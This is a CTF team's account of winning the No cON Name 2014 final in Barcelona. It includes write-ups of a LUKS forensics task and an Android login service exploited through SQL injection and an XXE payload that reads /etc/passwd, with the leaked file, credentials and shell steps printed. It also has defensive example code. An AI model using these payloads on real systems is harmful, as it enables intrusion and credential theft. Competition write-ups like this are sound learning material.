From October 30 to November 1, the International Conference on Information Security No cON Name 2014 was held in Barcelona, and within it the Capture The Flag competition was held for the second time. The BalalaikaCr3w team of Innopolis University took part in this competition and won first place. Below is our story about how it went, a few examples of tasks, and thanks to those who helped us.
CTF area during the final
What is CTF
For those who do not know what a "Capture The Flag" competition is: it is a kind of programming competition, only here you often do not write your own code but exploit errors in someone else's. Tasks imitate vulnerabilities found in real programs, for example buffer overflows, "home-made" cryptography, or unescaped insertion of text into an SQL query, or they require actions similar to those used in computer incident investigation: log analysis, searching for deleted files and hidden data. The result of a correctly completed task is a text string, the flag. The flags obtained are submitted to the competition organizers to score points for the team.
Most of these competitions are online with free registration. The largest of them also have a final round, where several teams (about 10) that took the top places in the online round gather at the organizers' site to compete for first place on equal terms (regardless of time zone).
A bit of history: "No cON Name CTF 2013"
Last year, No cON Name CTF was organized jointly with Facebook. Despite the rather strange qualifying round, which consisted of only three tasks, the final turned out to be interesting and worth attention. The format of last year's final was somewhat unusual for hacking CTF competitions: there were tasks, for each of which a fixed number of points was awarded on solution, and there were also neutral services hosted on the organizers' servers. While exploiting a vulnerability in one of the services, a team had to write its name into a specific file on the server. Once per set period, the organizers' checking program read the team name from this file and awarded that team a certain number of points.
The team of BalalaikaCr3w took the 3rd place last year
Qualifying round "No cON Name 2014"
This year the qualifying round lasted 24 hours and consisted of 10 tasks, 9 of which we solved in the first hours of the game. The last task, called Explicit, we managed to solve only 5-6 hours before the end of the CTF. Write-ups of some tasks of the qualifying stage can be found in our blog.
Finals “No cON Name 2014”
The final, as you already understood, was held in Barcelona, on the premises of Ramón Llull University. Conditions: 8 hours, 16 tasks. Task prices ranged from 150 to 400 points. One of the tasks was a shared interactive service, the "capture" of which brought the team 50 points every 10 minutes.
Next we describe a couple of tasks and our approach to solving them. This text was written not so much for information security enthusiasts as for people curious about what happens at such competitions, so we simplified some points at the expense of detail. For detailed write-ups there are the teams' write-up blogs.
HIDDENtation Task (300 points)
Task: "Dig deep into the file and find the flag", with a file of about 95 MB attached.
One of the most enjoyable moments of any CTF is studying something new. This time we needed to understand the LUKS disk encryption format. That the attached file is exactly such an encrypted virtual disk we quickly found out using a hex editor and searching the Internet for the string "LUKs" (4C 55 4B 73).
The standard cryptsetup utility for this disk format refused to work with the file from the task, displaying the message "Device hiddentation is not a valid LUKS device". From the format description we learn that the correct signature at the beginning of the file should be "LUKS" (4C 55 4B 53). We fix it, and now the file opens, but we do not have a key for the encrypted disk.
After reading the documentation, we find out that the disk is encrypted with a master key, but this key itself is not given to the user: it is stored in several copies, in encrypted form, in the disk header. Each copy of the master key is decrypted with its own user key. There can be up to eight such user keys, matching the number of specially designated slots in the disk header.
In our case, the cryptsetup utility claimed that all eight slots were empty. But looking carefully in the hex editor at the place where the slots are located, you can see that one of them does contain some data:
The first four bytes of the record, with the value 0x0000DEAD, indicate that it is inactive. Replacing them with 0x00AC71F3 activates this entry. Now we need to find the user key for this slot.
Immediately after the header, in the place where zero bytes are normally placed for alignment, there is text with some special characters: "Try \x19 most common passwd in \x07\xDD", which can be read as "Try the 25 most popular passwords of 2013". However, none of the 25 most popular passwords opened the container.
The next step, unfortunately, turned out to be a "guessing game" (the least loved category of tasks for all CTF teams). We were lucky that the cryptsetup utility creates containers identical to the one in the task. Having created a container ourselves, we noticed that the entry for the last key slot contains the value 0x0708 in the "key material offset" field, whereas in the file from the task it is 0x0608:
Replacing it with the correct value allows the container to be opened with the password "shadow".
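As an added illustration (it is neither part of the original write-up nor cryptsetup's own code), the following Python script parses a LUKS1 header with nothing but the standard library and checks the three things the story turned on: the 6-byte magic, each key slot's active marker (0x00AC71F3 enabled, 0x0000DEAD disabled), and whether a slot's key-material offset matches where cryptsetup would have placed it (areas rounded up to 4 KiB and laid out after the first 4 KiB block, which yields 0x0708 for slot 7 with 32-byte keys and the default 4000 stripes). The sample header is constructed in code to reproduce the task's three defects; its cipher, hash, iteration count and UUID are placeholders.

```python
import struct

# LUKS1 on-disk layout (all integers big-endian), per the LUKS1 specification.
LUKS_MAGIC = b"LUKS\xba\xbe"           # the task file had "LUKs" in the first 4 bytes
LUKS_KEY_ENABLED = 0x00AC71F3
LUKS_KEY_DISABLED = 0x0000DEAD
SECTOR = 512
KEYSLOT_ALIGN = 4096                   # cryptsetup aligns key-material areas to 4 KiB
HDR_FMT = ">6sH32s32s32sII20s32sI40s"  # magic, version, cipher, mode, hash, payload-offset,
                                       # key-bytes, mk-digest, mk-salt, mk-iterations, uuid
SLOT_FMT = ">II32sII"                  # active, iterations, salt, key-material-offset, stripes
HDR_LEN = struct.calcsize(HDR_FMT)     # 208; the 8 key slots follow directly
SLOT_LEN = struct.calcsize(SLOT_FMT)   # 48
HDR_SIZE = HDR_LEN + 8 * SLOT_LEN      # 592


def expected_key_material_offset(slot, key_bytes, stripes=4000):
    """Sector where cryptsetup places the key material of slot `slot`: areas of
    key_bytes*stripes bytes, each rounded up to 4 KiB, laid out after the first
    4 KiB block. With 32-byte keys this gives 8 for slot 0 and 0x0708 for slot 7."""
    area = -(-(key_bytes * stripes) // KEYSLOT_ALIGN) * KEYSLOT_ALIGN
    return (KEYSLOT_ALIGN + slot * area) // SECTOR


def parse_header(data):
    if len(data) < HDR_SIZE:
        raise ValueError("too short for a LUKS1 header")
    f = struct.unpack_from(HDR_FMT, data, 0)
    hdr = {"magic": f[0], "version": f[1],
           "cipher": f[2].rstrip(b"\0").decode(), "key_bytes": f[6], "slots": []}
    for i in range(8):
        active, iters, salt, offset, stripes = struct.unpack_from(
            SLOT_FMT, data, HDR_LEN + i * SLOT_LEN)
        hdr["slots"].append({"active": active, "iterations": iters, "salt": salt,
                             "offset": offset, "stripes": stripes})
    return hdr


def audit(data):
    """Return (field, slot, found, expected) tuples for the inconsistencies the task used."""
    hdr = parse_header(data)
    issues = []
    if hdr["magic"] != LUKS_MAGIC:
        issues.append(("magic", None, hdr["magic"], LUKS_MAGIC))
    for i, s in enumerate(hdr["slots"]):
        has_material = s["iterations"] != 0 or s["salt"].strip(b"\0") != b""
        # A slot flagged disabled that still carries a salt and an iteration count
        # is exactly what the hex editor showed: hidden, not empty.
        if s["active"] == LUKS_KEY_DISABLED and has_material:
            issues.append(("active", i, s["active"], LUKS_KEY_ENABLED))
        if s["active"] == LUKS_KEY_ENABLED or has_material:
            exp = expected_key_material_offset(i, hdr["key_bytes"], s["stripes"] or 4000)
            if s["offset"] != exp:
                issues.append(("offset", i, s["offset"], exp))
    return issues


def repair(data):
    """Write the expected values back, as the write-up did by hand in a hex editor."""
    out = bytearray(data)
    for field, slot, _found, expected in audit(data):
        if field == "magic":
            out[0:6] = expected
        elif field == "active":
            struct.pack_into(">I", out, HDR_LEN + slot * SLOT_LEN, expected)
        elif field == "offset":
            struct.pack_into(">I", out, HDR_LEN + slot * SLOT_LEN + 40, expected)
    return bytes(out)


def build_task_like_header():
    """Constructed sample (not the real task file) with the three defects described:
    wrong magic, slot 7 marked disabled although populated, and its offset 0x0608."""
    buf = bytearray(HDR_SIZE)
    struct.pack_into(HDR_FMT, buf, 0, b"LUKs\xba\xbe", 1, b"aes", b"cbc-essiv:sha256",
                     b"sha1", 4096, 32, b"\0" * 20, b"\0" * 32, 1000, b"placeholder-uuid")
    for i in range(8):
        struct.pack_into(SLOT_FMT, buf, HDR_LEN + i * SLOT_LEN, LUKS_KEY_DISABLED, 0,
                         b"\0" * 32, expected_key_material_offset(i, 32), 4000)
    struct.pack_into(SLOT_FMT, buf, HDR_LEN + 7 * SLOT_LEN, LUKS_KEY_DISABLED, 100000,
                     b"\x11" * 32, 0x0608, 4000)
    return bytes(buf)


if __name__ == "__main__":
    for issue in audit(build_task_like_header()):
        print(issue)
    print(audit(repair(build_task_like_header())))   # [] once repaired
```

Running the script on a real image means reading its first 592 bytes; the audit only reports what differs from the specification's constants and cryptsetup's layout, so a slot reported as "hidden" still needs the passphrase, exactly as in the task.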
But this is not the whole solution. The decrypted container held a disk image with three partitions. Hint files in the first two partitions said what to look for in the third. The third partition did not contain any files at all. As the organizers explained to us later, at some offset there was an NTFS partition containing a file. However, we used the first rule of CTF: "strings everywhere". Among the heap of strings from the file we find one very interesting one:
rot13:APAq986942o809qnn32n6987n7422771n53s59r5n1s02rq700ppr43p5196non749r
As a result, after applying rot13 we get the flag:
NCNd986942b809daa32a6987a7422771a53f59e5a1f02ed700cce43c5196aba749e
Task demDROID (400 points)
Task: an Android application given as an .apk file.
There are plenty of articles on Habr about how to unpack such files, so we will not dwell on that. After decompiling, we find that the application connects to the server 10.210.6.1 on the game subnet and sends the following HTTP request:
POST / HTTP/1.0
Content-Type: text/xml
User-Agent: denDROID 1.0
Host: 10.210.6.1

<login><username>{$username}</username><password>{$password}</password></login>
At this point we have two possible avenues of exploitation:
1. SQL injection. Compare two requests (without headers):
Normal request:
<login><username>balalaika</username><password>asd</password></login>
Answer:
<response>User balalaika is not found!</response>
Injection request with login:
<login><username>q' OR 'x'='x</username><password>asd</password></login>
Answer:
<response>Invalid password for user q' OR 'x'='x!</response>
2. XXE attack (XML eXternal Entity)
Request:
<!DOCTYPE login [<!ENTITY xxe SYSTEM "/etc/passwd">]><login><username>q' OR 1=1 /*&xxe;</username><password>&xxe;</password></login>
Answer:
<response>Invalid password for user q' OR 1=1 /*root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh # sync:x:4:65534:sync:/bin:/bin/sync # games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh # lp:x:7:7:lp:/var/spool/lpd:/bin/sh # mail:x:8:8:mail:/var/mail:/bin/sh # news:x:9:9:news:/var/spool/news:/bin/sh # uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin messagebus:x:102:103::/var/run/dbus:/bin/false ch6:x:1000:1000::/home/ch6:/bin/sh !</response>
Using XXE, we try various candidate names for the flag file (flag, flag.txt, /flag, /flag.txt, etc.), as well as various configuration files (for example /etc/nginx/nginx.conf), but find nothing interesting.
We return to exploiting the SQL injection. Using the SUBSTR() function, we extract the login and password of what turned out to be the only user in the database. We try to log in as that user:
<login><username>l3wlzHunt3r</username><password>mw4h4h4</password></login>
Server response:
<response>Welcome, l3wlzHunt3r! Good job! But your flag is in another castle!</response>
Oh, these trolls.
Alas, this is not the answer. Sometimes CTF tasks are arranged so that what at first glance looks like the correct solution leads to a false result. A honeypot, so to speak.
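To make the two responses above concrete from the defender's side, here is an added example (our illustration, not the task's server code, which we never saw): a minimal login handler in Python over an in-memory SQLite database, written in the string-concatenating form the responses imply, next to a hardened version with a bound parameter, plus an XML reader that refuses any DTD so that an external entity like the one in the XXE request is never even declared. The users table, the account ctfuser and its password are constructed for the example.

```python
import sqlite3
import xml.etree.ElementTree as ET


def make_db():
    """Constructed fixture: one account, so the 'username lookup, then password
    check' behaviour of the task's server can be reproduced offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('ctfuser', 'correct-horse')")
    return conn


def extract_credentials(xml_text):
    """Read <login><username/><password/></login> without DTD processing.

    Rejecting any DOCTYPE before the parser sees the document is the standard
    XXE mitigation: with no DTD there are no entity declarations, internal or
    external, whatever the parser's own defaults happen to be.
    """
    upper = xml_text.upper()
    if "<!DOCTYPE" in upper or "<!ENTITY" in upper:
        raise ValueError("DTD/entity declarations are not accepted")
    root = ET.fromstring(xml_text)
    if root.tag != "login":
        raise ValueError("unexpected root element")
    return root.findtext("username", ""), root.findtext("password", "")


def login_vulnerable(conn, username, password):
    """The pattern the observed responses imply: the username is pasted into the
    query text, so a crafted username changes which row the lookup returns."""
    sql = "SELECT username, password FROM users WHERE username = '%s'" % username
    row = conn.execute(sql).fetchone()
    if row is None:
        return "User %s is not found!" % username
    if row[1] != password:
        return "Invalid password for user %s!" % username
    return "Welcome, %s!" % row[0]


def login_hardened(conn, username, password):
    """Same logic with a bound parameter: the username is data, never SQL text."""
    row = conn.execute(
        "SELECT username, password FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None or row[1] != password:
        # One generic message for both failures also closes the enumeration
        # oracle ("not found" vs "invalid password") that the injection relied on.
        return "Invalid username or password"
    return "Welcome, %s!" % row[0]


if __name__ == "__main__":
    db = make_db()
    injected = "<login><username>q' OR 'x'='x</username><password>asd</password></login>"
    creds = extract_credentials(injected)
    print(login_vulnerable(db, *creds))   # Invalid password for user q' OR 'x'='x!
    print(login_hardened(db, *creds))     # Invalid username or password
```

The vulnerable handler answers the injected username with "Invalid password", not "not found", because the OR clause made the lookup return the first row of the table; that difference in messages is the whole signal the blind SUBSTR() extraction described above works from, and the hardened version removes both the injection and the differing messages.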
There was nothing else in the database, so we had to go back to XXE. Looking at the .bash_history file of the user ch6, we saw some suspicious lines:
...
tjG86fKwJ2yZ
...
sudo vim /etc/hosts
ping Wopr
sudo vim /etc/hosts
ping Osiris
nc Osiris 1135
nc Osiris 11235
curl Osiris 11235
curl Osiris:11235
...
It turned out that tjG86fKwJ2yZ is the password of user ch6. The rest is straightforward:
ssh ch6@10.210.6.1
tjG86fKwJ2yZ
$ curl Osiris:11235
NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f
Flag:
NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f
We would like to note that this was not a very well thought-out move on the part of the organizers, because the permissions were set so that ssh access allowed one to wipe .bash_history, add one's own public keys to authorized_keys, and completely deny access to the other teams.
It is also noteworthy that the host Osiris (whose address could be obtained via XXE from the /etc/hosts file) was not directly reachable from the team computers. It could only be reached from the server 10.210.6.1.
Nevertheless, the task turned out to be difficult and, on the whole, interesting, because it required skills in two categories at once (reverse engineering + web).
Chronology
We practically took the initiative from the first minutes, drawing first blood:
The first task we solved was a fairly simple steganography task called WireTap.
By the middle of the day the home team, the most experienced Spanish team int3pids, opened their score by capturing the neutral service dragons. The intrigue was growing, since int3pids received 50 points every 10 minutes for the captured service while simultaneously solving other tasks and getting points for them. A couple of hours later the Ukrainian team dcua entered the fight by solving a task called vodka, but it was already difficult for them to claim victory: our BalalaikaCr3w team and the int3pids team were too far ahead.
As a result, we managed to hold the top line of the scoreboard until the very end of the competition:
Teams with a score of zero were not shown on the scoreboard
It is worth noting that the NcN CTF in Barcelona has been held for only the second year and is not as popular and well-known as some other CTF competitions. However, the quality of the event is growing. We would like to wish the No cON Name association not to stop at what has been achieved, but to keep moving forward, prepare even more interesting tasks, attract more sponsors and raise the level and prestige of its conference and CTF.
Thanks
The BalalaikaCr3w team is grateful to Innopolis University for the support and organization of our trip to the final. Innopolis is a new university focused on IT and robotics. Starting next year, a Master's programme in Cyber Security is planned to open, and the university is actively attracting young professionals in the field of information security.
Our team is also grateful to the companies "Aktiv" and "ABBYY Language Services" for supporting their employees' participation in this event.
Links
Write-ups of tasks from the No cON Name CTF 2014 final and other competitions can be read in our blog: ctfcrew.org
Information about upcoming CTFs and, in general, about all events in the CTF world is on the main resource for all teams: ctftime.org.